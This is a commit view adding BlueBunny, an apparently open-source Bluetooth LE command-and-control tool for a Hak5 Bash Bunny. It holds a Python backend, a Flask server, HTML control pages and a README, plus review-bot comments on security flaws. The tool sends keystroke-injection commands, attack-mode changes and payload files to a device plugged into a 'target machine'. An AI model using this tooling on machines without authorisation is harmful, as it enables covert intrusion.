Merge branch 'hak5:master' into master

This commit is contained in:
Darkprince
2024-07-01 10:30:39 +05:30
committed by GitHub
729 changed files with 143657 additions and 24 deletions


@@ -0,0 +1,46 @@
import pygatt
import base64
adapter = pygatt.GATTToolBackend()
char_uuid = '0000fff2-0000-1000-8000-00805f9b34fb'
def init():
adapter.start()
return True
def connect():
device_name = 'BlueBunny'
devices = adapter.scan(run_as_root=True)
device = next((d for d in devices if d['name'] == device_name), None)
if device:
device_address = device['address']
bunny = adapter.connect(device_address)
return bunny
else:
return False
def send(bunny, data: str, d_type: str):
if d_type == "cmd":
flag = "<CMD>"
else:
flag = "<PAYLOAD>"
data = flag + data + flag
data = base64.b64encode(data.encode("utf-8")).decode("utf-8")
if not len(data) <= 15:
data_pieces = []
for i in range(0, len(data), 15):
data_pieces.append(data[i:i + 15])
for i, piece in enumerate(data_pieces):
if i == (len(data_pieces) - 1):
bunny.char_write(char_uuid, (piece + "\n").encode("utf-8"))
else:
bunny.char_write(char_uuid, piece.encode("utf-8"))
else:
bunny.char_write(char_uuid, (data + "\n").encode("utf-8"))
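Review bot: `connect()` selects the peer purely by its advertised name `BlueBunny` (the `d['name'] == device_name` match) and nothing in this file pairs, bonds or otherwise authenticates the link, so any BLE device in range that advertises that name receives every command and payload `send()` writes to the `0000fff2-…` characteristic — base64 is an encoding, not encryption. Consider letting the caller pin the hardware address, e.g. `def connect(address: str | None = None):` with `device = next((d for d in devices if d['address'] == address), None) if address else …`, and document the trust assumption on `connect()`: `# NOTE: the link is unauthenticated; anyone within BLE range can impersonate or eavesdrop on the Bunny`. `send()` also dereferences `bunny` without checking it, although `connect()` returns `False` on failure; a guard such as `if not bunny: raise ConnectionError("not connected to a Bash Bunny")` before the first `char_write` turns the resulting `AttributeError` into an actionable error. The 15-byte chunking and the `d_type` mapping (anything other than `"cmd"` becomes `<PAYLOAD>`) deserve a comment, since the receiving side depends on both.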


@@ -0,0 +1,61 @@
from flask import Flask, request, render_template, jsonify
import urllib.parse
import threading
import BunnyLE
app = Flask(__name__)
bb = None
connection = 0
con_fail_count = 0
def connect_bunny():
global bb
global connection
global con_fail_count
BunnyLE.init()
current_try = BunnyLE.connect()
if not current_try == False:
bb = current_try
connection = 1
else:
con_fail_count += 1
connection = 2
@app.route("/", methods=['GET', 'POST'])
def index():
if request.method == 'POST':
global bb
query = request.form.get('query')
mode = request.form.get('mode')
BunnyLE.send(bb, query, mode)
return render_template("index.html")
@app.route("/connect", methods=['GET'])
def connect():
connect_thread = threading.Thread(target=connect_bunny)
connect_thread.start()
return render_template("connecting.html")
@app.route("/con-check", methods=['GET'])
def connectCheck():
global con_fail_count
if connection == 0:
return jsonify(connected=0)
elif connection == 1:
return jsonify(connected=1)
elif connection == 2:
if con_fail_count < 5:
connect_bunny()
return jsonify(connected=0)
else:
return jsonify(connected=2)
if __name__ == '__main__':
app.run(host="localhost", port=1472, debug=True)
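Review bot: `index()` accepts `query`/`mode` from any POST with no CSRF token, origin check or authentication, and the forwarded command is executed on the Bash Bunny, so a web page opened in the operator's browser can silently drive the device through `http://localhost:1472/`; a minimal guard is to reject cross-site requests, e.g. `origin = request.headers.get("Origin")` then `if origin and origin != request.host_url.rstrip("/"): abort(403)` (with `abort` imported from flask), or a per-session CSRF token. `app.run(..., debug=True)` additionally enables the Werkzeug interactive debugger, which is a code-execution surface on any unhandled exception; the README on this page starts the server with `sudo python c2-server.py`, so that debugger would run as root — ship with `debug=False`. Such an exception is easy to hit here: `bb` stays `None` until `/connect` succeeds, yet `index()` passes it straight to `BunnyLE.send`, so a POST before a connection raises inside the handler; check `connection == 1` (or `bb is not None`) first and return an error page instead. `mode` is also passed through unvalidated; restricting it to `{"cmd", "payload"}` keeps the server in control of which path the device takes. `urllib.parse` is imported but never used.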



@@ -0,0 +1,163 @@
<!DOCTYPE html>
<html>
<head>
<link rel="SHORTCUT ICON" type="image/x-icon" href="static/bb_icon.png"/>
<link rel="icon" type="image/x-icon" href="static/bb_icon.png" />
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>BlueBunny</title>
<meta name="description" content="Remote control your Bash Bunny MKII">
<link href="static/bootstrap.min.css" rel="stylesheet">
<style type="text/css">
.btn-imp {
--bs-btn-color: #EC1A24 !important;
--bs-btn-border-color: #EC1A24 !important;
--bs-btn-hover-border-color: #1a62ec !important;
--bs-btn-hover-bg: #1a62ec !important;
--bs-btn-hover-color: #ffffff !important;
}
@keyframes spinner {
0% {transform: rotate( 0deg ) scale( 1 );}
100% {transform: rotate( 360deg ) scale( 1 );}
};
</style>
<script type="text/javascript">
let fail_counter = 0
function tryAgain() {
document.getElementById("action").innerHTML = '<h3 class="text-center" style="color: #ced4da; margin-bottom: 10px;">Connecting your Bash Bunny...</h3><div class="text-center" style="margin-top: 100px;"><a class="btn btn-imp" title="Connect" href="/connect" id="connectBtn">Too many fails occured... Try again</a><br><br><p class="fw-bold">OR</p></div><ul style="margin-bottom: 100px;"><li>Make sure your bluetooth adapter is running properly</li><li>Restart your Bash Bunny via unplugging and plugging it back in</li><li>Restart the BlueBunny C2 server\'s operating system</li></ul><p>Please be patient - Making BLE connections can be buggy. It\'s likely a temporary problem that will be gone in a minute.</p>'
}
function connectionCheck() {
fetch("/con-check").then(function(response) {
return response.json();
}).then(function(data) {
if (data.connected == 1) {
window.location.replace("/");
} else if (data.connected == 2) {
tryAgain();
}
})
}
setInterval(connectionCheck, 5000);
</script>
</head>
<body style="background-color: #202124; color: #adb5bd; height: 100%; overflow: hidden">
<div style="filter: blur(2.5px); position: absolute; width: 100%; height: 100%;">
<nav class="navbar navbar-expand navbar-light fixed-top shadow-sm" style="border-bottom: solid; border-color: #1a62ec; border-width: 2.5px; background: #202124;">
<div class="container-fluid">
<a class="navbar-brand">
<img src="static/logo.png" style="height: 45px; padding-right: 15px; filter: brightness(0) saturate(100%) invert(23%) sepia(75%) saturate(3313%) hue-rotate(217deg) brightness(99%) contrast(86%);" class="d-inline-block">
</a>
<button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarToggler" aria-controls="navbarToggler" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarToggler">
<ul class="nav ms-auto">
<li class="nav-item">
<button class="btn" title="Connect" disabled>Connect to Bash Bunny</button>
</li>
<li class="nav-item" style="margin: auto; margin-right: 15px; margin-left: 20px;">
<a>©</a>
</li>
</ul>
</div>
</div>
</nav>
<nav class="navbar navbar-expand-lg navbar-light" style="visibility: hidden;">
<div class="container-fluid">
<a class="navbar-brand" href="#">
<img src="static/bb_icon.png" style="height: 45px; padding-right: 15px;" class="d-inline-block"><span style="vertical-align: middle;">BlueBunny</span>
</a>
<button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarToggler" aria-controls="navbarToggler" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse">
<ul class="nav">
<li class="nav-item">
<a class="btn">Connect to Bash Bunny</a>
</li>
<li class="nav-item" style="margin: auto; margin-right: 15px; margin-left: 20px;">
<a>©</a>
</li>
</ul>
<ul class="nav ms-auto">
<li class="nav-item">
<a class="nav-link">©</a>
</li>
</ul>
</div>
</div>
</nav>
<br>
<br>
<div class="container" style="display: flex; flex-flow: wrap; justify-content: start;">
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
<h4 style="color: #ced4da;">Payload One-Liner <p class="text-dark-emphasis" style="font-size: 15px;"><small>Run a single line of code</small></p></h4>
<div class="input-group mb-3">
<input type="text" class="form-control" placeholder="Q ALT F4" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;">
<button class="btn">Run</button>
</div>
</div>
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
<h4 style="color: #ced4da;">Payload Script <p class="text-dark-emphasis" style="font-size: 15px;"><small>Upload and execute a payload file</small></p></h4>
<div class="input-group mb-3">
<input type="file" class="form-control" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;">
</div>
<button class="btn">Execute Payload</button>
</div>
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
<h4 style="color: #ced4da;">Attack Mode <p class="text-dark-emphasis" style="font-size: 15px;"><small>Configure Ethernet, Storage, HID and Serial</small></p></h4>
<div class="input-group">
<select class="form-select" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;">
<option selected>None</option>
</select>
<button class="btn">Update</button>
</div>
</div>
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
<h4 style="color: #ced4da;">LED <p class="text-dark-emphasis" style="font-size: 15px;"><small>Light up your Bush Bunny</small></p></h4>
<div class="input-group">
<select class="form-select" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;" name="query">
<option selected>Green</option>
</select>
<button class="btn">Update</button>
</div>
</div>
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
<h4 style="color: #ced4da;">CPU <p class="text-dark-emphasis" style="font-size: 15px;"><small>Tune the CPU to your needs</small></p></h4>
<div class="input-group">
<select class="form-select" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;">
<option selected>Quad Core Ondemand (Default)</option>
</select>
<button class="btn">Update</button>
</div>
</div>
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
<h4 style="color: #ced4da;">Power <p class="text-dark-emphasis" style="font-size: 15px;"><small>Take a break</small></p></h4>
<div class="input-group">
<select class="form-select" style="background-color: #202124; border-color: #EC1A24; color: #adb5bd;">
<option selected>Shutdown</option>
</select>
<button class="btn btn-imp">Initialize</button>
</div>
</div>
</div>
</div>
<div style="position: absolute; width: 100%; height: 100%;">
<div style="display: flex; justify-content: center; align-items: center; margin-top: 25px;">
<div class="rounded shadow" style="border: solid; border-color: #1a62ec; border-width: 1px; background: #202124; max-width: 600px; height: fit-content; margin-left: 15px; margin-right: 15px; display: flex; justify-content: center;">
<div style="margin: 20px; width: 100%" id="action">
<h3 class="text-center" style="color: #ced4da; margin-bottom: 10px;">Connecting your Bash Bunny...</h3>
<div class="text-center" style="margin-top: 100px; margin-bottom: 100px;">
<img src="static/bb_icon.png" style="height: 5rem; width: 5rem; animation-name: spinner; animation-duration: 1s; animation-delay: 1s; animation-iteration-count: infinite;">
</div>
<p>This can take some time. Make sure your Bash Bunny is nearby and the BlueBunny payload is running successfully (Green LED).</p>
</div>
</div>
</div>
</div>
</body>
</html>
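Review bot: `fail_counter` (declared at the top of the inline script) is never read or incremented, so it is dead code; either drop it or use it to stop the `setInterval(connectionCheck, 5000)` poll once `tryAgain()` has fired, which otherwise keeps hitting `/con-check` every 5 s for as long as the tab is open. The stray `};` after the `@keyframes spinner` rule is not valid CSS and should be `}`. Both are style points; the page logic itself is a thin polling loop.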


@@ -0,0 +1,337 @@
<!DOCTYPE html>
<html>
<head>
<link rel="SHORTCUT ICON" type="image/x-icon" href="static/bb_icon.png"/>
<link rel="icon" type="image/x-icon" href="static/bb_icon.png" />
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>BlueBunny</title>
<meta name="description" content="Remote control your Bash Bunny MKII">
<link href="static/bootstrap.min.css" rel="stylesheet">
<style type="text/css">
.btn-imp {
--bs-btn-color: #EC1A24 !important;
--bs-btn-border-color: #EC1A24 !important;
--bs-btn-hover-border-color: #1a62ec !important;
--bs-btn-hover-bg: #1a62ec !important;
--bs-btn-hover-color: #ffffff !important;
}
.btn {
--bs-btn-color: #1a62ec;
--bs-btn-border-color: #1a62ec;
--bs-btn-hover-border-color: #1a62ec;
--bs-btn-hover-bg: #1a62ec;
--bs-btn-hover-color: #ffffff;
}
code {
color: #1a62ec;
}
.form-control::placeholder {
color: #adb5bd;
opacity: 0.5;
}
</style>
<script type="text/javascript">
function disableControl() {
forms = document.getElementsByClassName('form');
for (i = 0; i < forms.length; i++) {
forms[i].getElementsByTagName('form')[0].hidden = true;
forms[i].getElementsByTagName('h6')[0].hidden = false;
}
}
function enableControl() {
forms = document.getElementsByClassName('form');
for (i = 0; i < forms.length; i++) {
forms[i].getElementsByTagName('h6')[0].hidden = true;
forms[i].getElementsByTagName('form')[0].hidden = false;
}
}
function connectionCheck() {
fetch("/con-check").then(function(response) {
return response.json();
}).then(function(data) {
if (data.connected == 0 || data.connected == 2) {
document.getElementById("connectBtn").hidden = false;
disableControl();
} else if (data.connected == 1) {
document.getElementById("connectBtn").hidden = true;
enableControl();
}
})
}
function info(topic) {
window.scrollTo(0, 0);
document.getElementsByTagName("BODY")[0].style["overflow"] = "hidden";
document.getElementById("page").style["filter"] = "blur(2.5px)";
document.getElementById("page").style["position"] = "absolute";
document.getElementById("page").style["width"] = "100%";
document.getElementById("page").style["height"] = "100%";
document.getElementById(topic).hidden = false;
}
function infoClose(topic) {
document.getElementsByTagName("BODY")[0].style["overflow"] = null;
document.getElementById("page").style["filter"] = null;
document.getElementById("page").style["position"] = null;
document.getElementById("page").style["width"] = null;
document.getElementById("page").style["height"] = null;
document.getElementById(topic).hidden = true;
}
function execPayloadFile() {
const reader = new FileReader();
reader.readAsText(document.getElementById("payloadFile").files[0]);
reader.onloadend = () => {
query = reader.result;
document.getElementById("payloadContent").value = query;
document.getElementById("payloadForm").submit();
};
}
connectionCheck()
setInterval(connectionCheck, 10000);
</script>
</head>
<body style="background-color: #202124; color: #adb5bd; height: 100%">
<div id="page">
<div>
<nav class="navbar navbar-expand navbar-light fixed-top shadow-sm" style="border-bottom: solid; border-color: #1a62ec; border-width: 2px; background: #202124;">
<div class="container-fluid">
<a class="navbar-brand">
<img src="static/logo.png" onclick="info('info_cp')" style="cursor: pointer; height: 45px; padding-right: 15px; padding-bottom: 5px; filter: brightness(0) saturate(100%) invert(23%) sepia(75%) saturate(3313%) hue-rotate(217deg) brightness(99%) contrast(86%);" class="d-inline-block">
</a>
<button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarToggler" aria-controls="navbarToggler" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarToggler">
<ul class="nav ms-auto">
<li class="nav-item">
<a class="btn btn-imp" title="Connect" href="/connect" id="connectBtn" hidden>Connect to Bash Bunny</a>
</li>
<li class="nav-item" style="margin: auto; margin-right: 15px; margin-left: 20px;">
<a style="cursor: pointer; font-size: 1.25rem;" title="Copyright & Attribution" onclick="info('info_cp')">©</a>
</li>
</ul>
</div>
</div>
</nav>
<nav class="navbar navbar-expand-lg navbar-light" style="visibility: hidden;">
<div class="container-fluid">
<a class="navbar-brand" href="#">
<img src="static/bb_icon.png" style="height: 45px; padding-right: 15px;" class="d-inline-block"><span style="vertical-align: middle;">BlueBunny</span>
</a>
<button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarToggler" aria-controls="navbarToggler" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse">
<ul class="nav">
<li class="nav-item">
<a class="btn">Connect to Bash Bunny</a>
</li>
<li class="nav-item" style="margin: auto; margin-right: 15px; margin-left: 20px;">
<a>©</a>
</li>
</ul>
</div>
</div>
</nav>
</div>
<br>
<br>
<div class="container" style="display: flex; flex-flow: wrap; justify-content: start;">
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
<h4 style="color: #ced4da;">Payload One-Liner <p class="text-dark-emphasis" style="font-size: 15px;"><small>Run a single line of code</small></p></h4>
<div class="form">
<form action="" method="POST" hidden>
<div class="input-group mb-3">
<input type="text" class="form-control" placeholder="Q ALT F4" autocomplete="off" list="datalistOptions" name="query" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;">
<datalist id="datalistOptions">
<option value="Q STRING Hello World!"></option>
<option value="Q CAPSLOCK"></option>
<option value="Q ALT F4"></option>
<option value="Q COMMAND q"></option>
<option value="Q WIN r"></option>
<option value="Q COMMAND SPACE"></option>
</datalist>
<input type="hidden" name="mode" value="cmd">
<button class="btn" type="submit">Run</button>
</div>
</form>
<h6 hidden>Not available</h6>
</div>
</div>
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
<h4 style="color: #ced4da;">Payload Script<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-info-circle-fill" viewBox="-5 5 19 19" style="overflow: visible; cursor: pointer;" onclick="info('info_payload')"><path d="M8 15A7 7 0 1 1 8 1a7 7 0 0 1 0 14zm0 1A8 8 0 1 0 8 0a8 8 0 0 0 0 16z"/><path d="m8.93 6.588-2.29.287-.082.38.45.083c.294.07.352.176.288.469l-.738 3.468c-.194.897.105 1.319.808 1.319.545 0 1.178-.252 1.465-.598l.088-.416c-.2.176-.492.246-.686.246-.275 0-.375-.193-.304-.533L8.93 6.588zM9 4.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0z"/></svg> <p class="text-dark-emphasis" style="font-size: 15px;"><small>Upload and execute a payload file</small></p></h4>
<div class="form">
<form hidden>
<div class="input-group mb-3">
<input type="file" accept=".txt" class="form-control" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;" id="payloadFile">
</div>
<button class="btn" title="Execute Payload" onclick="execPayloadFile()">Execute Payload</button>
</form>
<form action="" method="POST" id="payloadForm">
<input type="hidden" name="mode" value="cmd">
<input type="hidden" name="query" value="" id="payloadContent">
</form>
<h6 hidden>Not available</h6>
</div>
</div>
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
<h4 style="color: #ced4da;">Attack Mode<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-info-circle-fill" viewBox="-5 5 19 19" style="overflow: visible; cursor: pointer;" onclick="info('info_attackmode')"><path d="M8 15A7 7 0 1 1 8 1a7 7 0 0 1 0 14zm0 1A8 8 0 1 0 8 0a8 8 0 0 0 0 16z"/><path d="m8.93 6.588-2.29.287-.082.38.45.083c.294.07.352.176.288.469l-.738 3.468c-.194.897.105 1.319.808 1.319.545 0 1.178-.252 1.465-.598l.088-.416c-.2.176-.492.246-.686.246-.275 0-.375-.193-.304-.533L8.93 6.588zM9 4.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0z"/></svg> <p class="text-dark-emphasis" style="font-size: 15px;"><small>Configure Ethernet, Storage, HID and Serial</small></p></h4>
<div class="form">
<form action="" method="POST" hidden>
<div class="input-group">
<select class="form-select" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;" name="query">
<option value="ATTACKMODE OFF" selected>None</option>
<option value="ATTACKMODE SERIAL">SERIAL</option>
<option value="ATTACKMODE ECM_ETHERNET">ECM ETHERNET</option>
<option value="ATTACKMODE RNDIS_ETHERNET">RNDIS ETHERNET</option>
<option value="ATTACKMODE AUTO_ETHERNET">AUTO ETHERNET</option>
<option value="ATTACKMODE STORAGE">STORAGE</option>
<option value="ATTACKMODE HID">HID</option>
</select>
<input type="hidden" name="mode" value="cmd">
<button class="btn" type="submit">Update</button>
</div>
</form>
<h6 hidden>Not available</h6>
</div>
</div>
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
<h4 style="color: #ced4da;">LED <p class="text-dark-emphasis" style="font-size: 15px;"><small>Light up your Bush Bunny</small></p></h4>
<div class="form">
<form action="" method="POST" hidden>
<div class="input-group">
<select class="form-select" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;" name="query">
<option value="LED G" selected>Green</option>
<option value="LED B">Blue</option>
<option value="LED R">Red</option>
<option value="LED Y">Yellow</option>
<option value="LED C">Cyan</option>
<option value="LED M">Magenta</option>
<option value="LED W">White</option>
</select>
<input type="hidden" name="mode" value="cmd">
<button class="btn" type="submit">Update</button>
</div>
</form>
<h6 hidden>Not available</h6>
</div>
</div>
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
<h4 style="color: #ced4da;">CPU Control <p class="text-dark-emphasis" style="font-size: 15px;"><small>Tune the CPU to your needs</small></p></h4>
<div class="form">
<form action="" method="POST" hidden>
<div class="input-group">
<select class="form-select" style="background-color: #202124; border-color: #1a62ec; color: #adb5bd;" name="query">
<option value="CUCUMBER ENABLE">Single Core Ondemand (Low Power)</option>
<option value="CUCUMBER DISABLE" selected>Quad Core Ondemand (Default)</option>
<option value="CUCUMBER PLAID">Quad Core Performance (High Performance)</option>
</select>
<input type="hidden" name="mode" value="cmd">
<button class="btn" type="submit">Update</button>
</div>
</form>
<h6 hidden>Not available</h6>
</div>
</div>
<div style="width: 20rem; margin-right: 50px; margin-bottom: 20px; min-height: 10rem;">
<h4 style="color: #ced4da;">Power Management<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-info-circle-fill" viewBox="-5 5 19 19" style="overflow: visible; cursor: pointer;" onclick="info('info_power')"><path d="M8 15A7 7 0 1 1 8 1a7 7 0 0 1 0 14zm0 1A8 8 0 1 0 8 0a8 8 0 0 0 0 16z"/><path d="m8.93 6.588-2.29.287-.082.38.45.083c.294.07.352.176.288.469l-.738 3.468c-.194.897.105 1.319.808 1.319.545 0 1.178-.252 1.465-.598l.088-.416c-.2.176-.492.246-.686.246-.275 0-.375-.193-.304-.533L8.93 6.588zM9 4.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0z"/></svg> <p class="text-dark-emphasis" style="font-size: 15px;"><small>Take a break</small></p></h4>
<div class="form">
<form action="" method="POST" hidden>
<div class="input-group">
<select class="form-select" style="background-color: #202124; border-color: #EC1A24; color: #adb5bd;" name="query">
<option value="shutdown -h now" selected>Shutdown</option>
<option value="reboot">Reboot</option>
</select>
<input type="hidden" name="mode" value="cmd">
<button class="btn btn-imp" type="submit">Initialize</button>
</div>
</form>
<h6 hidden>Not available</h6>
</div>
</div>
</div>
</div>
<div style="position: absolute; width: 100%; height: 100%;" id="info_payload" hidden>
<div style="display: flex; justify-content: center; align-items: center; margin-top: 25px;">
<div class="rounded shadow" style="border: solid; border-color: #1a62ec; border-width: 1px; background: #202124; max-width: 600px; height: fit-content; margin-left: 15px; margin-right: 15px; display: flex; justify-content: center;">
<div style="margin: 20px; width: 100%" id="action">
<h3 class="text-center" style="color: #ced4da; margin-bottom: 10px;">Payload Script</h3>
<p>This section allows you to execute custom payload files.</p>
<p>The name of the uploaded file doesn't have to match <code>payload.txt</code>.</p>
<p>Uploaded payloads will be sent to your Bash Bunny and will be saved temporary. After finishing your payload, it gets removed automatically.
<div class="text-center" style="margin-top: 100px;">
<button class="btn" onclick="infoClose('info_payload')">Close</button>
</div>
</div>
</div>
</div>
</div>
<div style="position: absolute; width: 100%; height: 100%;" id="info_attackmode" hidden>
<div style="display: flex; justify-content: center; align-items: center; margin-top: 25px;">
<div class="rounded shadow" style="border: solid; border-color: #1a62ec; border-width: 1px; background: #202124; max-width: 600px; height: fit-content; margin-left: 15px; margin-right: 15px; display: flex; justify-content: center;">
<div style="margin: 20px; width: 100%" id="action">
<h3 class="text-center" style="color: #ced4da; margin-bottom: 10px;">Attack Mode</h3>
<p>This section allows you to change the Bash Bunny's attack mode like the <code>ATTACKMODE</code> payload command does.</p>
<p>Further and more complex attack mode combinations can always be set from the "Payload One-Liner" or a payload file.</p>
<p class="fw-bold">Important:</p>
<p>When setting the attack mode, you likely can't change it without a reboot (besides disabling it again). The target machine may not recognize the change, for example, from STORAGE to HID. It may no longer detect the storage but won't be able to recognize the HID. Keep in mind: This can differ between target devices.</p>
<div class="text-center" style="margin-top: 100px;">
<button class="btn" onclick="infoClose('info_attackmode')">Close</button>
</div>
</div>
</div>
</div>
</div>
<div style="position: absolute; width: 100%; height: 100%;" id="info_power" hidden>
<div style="display: flex; justify-content: center; align-items: center; margin-top: 25px;">
<div class="rounded shadow" style="border: solid; border-color: #1a62ec; border-width: 1px; background: #202124; max-width: 600px; height: fit-content; margin-left: 15px; margin-right: 15px; display: flex; justify-content: center;">
<div style="margin: 20px; width: 100%" id="action">
<h3 class="text-center" style="color: #ced4da; margin-bottom: 10px;">Power Management</h3>
<p>This section allows you to shutdown or reboot your Bash Bunny.</p>
<p>After reboot, your Bash Bunny will run the payload available at the current switch position.</p>
<p>Rebooting may help when you encouter execution issues. When the attacked device won't recognize attack mode changes, rebooting and then setting the new attack mode will fix it.</p>
<div class="text-center" style="margin-top: 100px;">
<button class="btn" onclick="infoClose('info_power')">Close</button>
</div>
</div>
</div>
</div>
</div>
<div style="position: absolute; width: 100%; height: 100%;" id="info_cp" hidden>
<div style="display: flex; justify-content: center; align-items: center; margin-top: 25px;">
<div class="rounded shadow" style="border: solid; border-color: #1a62ec; border-width: 1px; background: #202124; max-width: 600px; height: fit-content; margin-left: 15px; margin-right: 15px; display: flex; justify-content: center;">
<div style="margin: 20px; width: 100%" id="action">
<h3 class="text-center" style="color: #ced4da; margin-bottom: 10px;">Copyright & Attribution</h3>
<br>
<img src="static/logo.png" style="height: 45px; padding-right: 15px; padding-bottom: 5px;" class="d-inline-block">
<p>BlueBunny is an open source project from <code><a href="https://github.com/90N45-d3v">90N45</a></code>.<br>It is licensed under the MIT license and should be treated as such.</p>
<br>
<img src="static/bb_icon_original.png" style="height: 45px; padding-right: 15px; padding-bottom: 5px;" class="d-inline-block">
<p>Bash Bunny is a trademark of Hak5 LLC.<br>Visit <code><a href="https://hak5.org">hak5.org</a></code> for more.</p>
<div class="text-center" style="margin-top: 100px;">
<button class="btn" onclick="infoClose('info_cp')">Close</button>
</div>
</div>
</div>
</div>
</div>
</body>
</html>
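Review bot: the hidden `payloadForm` sends the uploaded file with `mode` set to `cmd` (the `<input type="hidden" name="mode" value="cmd">` inside `#payloadForm`), so the whole file goes down the single-command path rather than the payload-file path the `info_payload` box describes ("will be saved temporary… removed automatically"); it should be `<input type="hidden" name="mode" value="payload">`. The "Execute Payload" button is a plain `<button>` inside a `<form>`, which defaults to `type="submit"`, so clicking it also submits that form (a GET to the same page) and may reload the page before the asynchronous `FileReader` `onloadend` callback submits `payloadForm`; mark it `<button type="button" class="btn" title="Execute Payload" onclick="execPayloadFile()">`. Each info overlay reuses `id="action"`, which is invalid HTML (ids must be unique) even though nothing on this page looks that id up. Minor text: `encouter` in the power info box and `Bush Bunny` in the LED heading.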


@@ -0,0 +1,92 @@
![BlueBunny-Banner](https://github.com/90N45-d3v/BlueBunny/assets/79598596/fae0b5ca-6b38-41b3-a5fc-7aa3cabea369)
<p align="center">
<img src="https://img.shields.io/badge/Made%20with-Python-blue">
<img src="https://img.shields.io/github/license/90N45-d3v/BlueBunny.svg">
<img src="https://img.shields.io/badge/Ask%20me-anything-1abc9c.svg">
<br>
<img src="https://img.shields.io/badge/-Linux-lightblue">
</p>
<p align="center">
C2 solution that communicates directly over Bluetooth-Low-Energy with your Bash Bunny Mark II.<br>Send your Bash Bunny all the instructions it needs just over the air.
</p>
* Author: 90N45
* Version: 1.0
* Category: Remote
* Attackmodes: NONE (Custom)
## Table of contents
- [Overview](https://github.com/90N45-d3v/BlueBunny#overview)
- [Installation & Start](https://github.com/90N45-d3v/BlueBunny#installation--start)
- [Manual communication with the Bash Bunny through Python](https://github.com/90N45-d3v/BlueBunny#manual-communication-with-the-bash-bunny-through-python)
- [Troubleshooting](https://github.com/90N45-d3v/BlueBunny#troubleshooting)
- [Working on...](https://github.com/90N45-d3v/BlueBunny#working-on)
- [Additional information](https://github.com/90N45-d3v/BlueBunny#additional-information)
## Overview
#### Structure
![BlueBunny-Structure](https://github.com/90N45-d3v/BlueBunny/assets/79598596/3004fb10-feef-45c8-8624-1393c2fb7288)
## Installation & Start
1. Install required dependencies
````
pip install pygatt "pygatt[GATTTOOL]"
````
Make sure [BlueZ](http://www.bluez.org/download/) is installed and `gatttool` is usable
````
sudo apt install bluez
````
2. Download the `BlueBunny` folder and switch into the `BlueBunny/C2` folder
````
cd BlueBunny/C2
````
3. Start the C2 server
````
sudo python c2-server.py
````
4. Plug your Bash Bunny with the BlueBunny payload into the target machine (payload at: `BlueBunny/payload.txt`).
5. Visit your C2 server from your browser on `localhost:1472` and connect your Bash Bunny (Your Bash Bunny will light up green when it's ready to pair).
## Manual communication with the Bash Bunny through Python
You can use BlueBunny's BLE backend and communicate with your Bash Bunny manually.
#### Example Code
````python
# Import the backend (BlueBunny/C2/BunnyLE.py)
import BunnyLE
# Define the data to send
data = "QUACK STRING I love my Bash Bunny"
# Define the type of the data to send ("cmd" or "payload") (payload data will be temporary written to a file, to execute multiple commands like in a payload script file)
d_type = "cmd"
# Initialize BunnyLE
BunnyLE.init()
# Connect to your Bash Bunny
bb = BunnyLE.connect()
# Send the data and let it execute
BunnyLE.send(bb, data, d_type)
````
## Troubleshooting
#### Connecting your Bash Bunny doesn't work? Try the following instructions:
- Try connecting a few more times
- Check if your bluetooth adapter is available
- Restart the system your C2 server is running on
- Check if your Bash Bunny is running the BlueBunny payload properly
- How far away from your Bash Bunny are you? Is the environment (distance, interferences etc.) still sustainable for typical BLE connections?
#### Bugs within BlueZ
The Bluetooth stack used is well known, but also very buggy. If starting the connection with your Bash Bunny does not work, it is probably a temporary problem due to BlueZ. Here are some kind of errors that can be caused by temporary bugs. These usually disappear at the latest after rebooting the C2's operating system, so don't be surprised and calm down if they show up.
- Timeout after 5.0 seconds
- Unknown error while scanning for BLE devices
## Working on...
- Remote shell access
- BLE exfiltration channel
- Improved connecting process
## Additional information
As I said, BlueZ, the base for the bluetooth part used in BlueBunny, is somewhat bug prone. If you encounter any non-temporary bugs when connecting to Bash Bunny as well as any other bugs/difficulties in the whole BlueBunny project, you are always welcome to contact me. Be it a problem, an idea/solution or just a nice feedback.


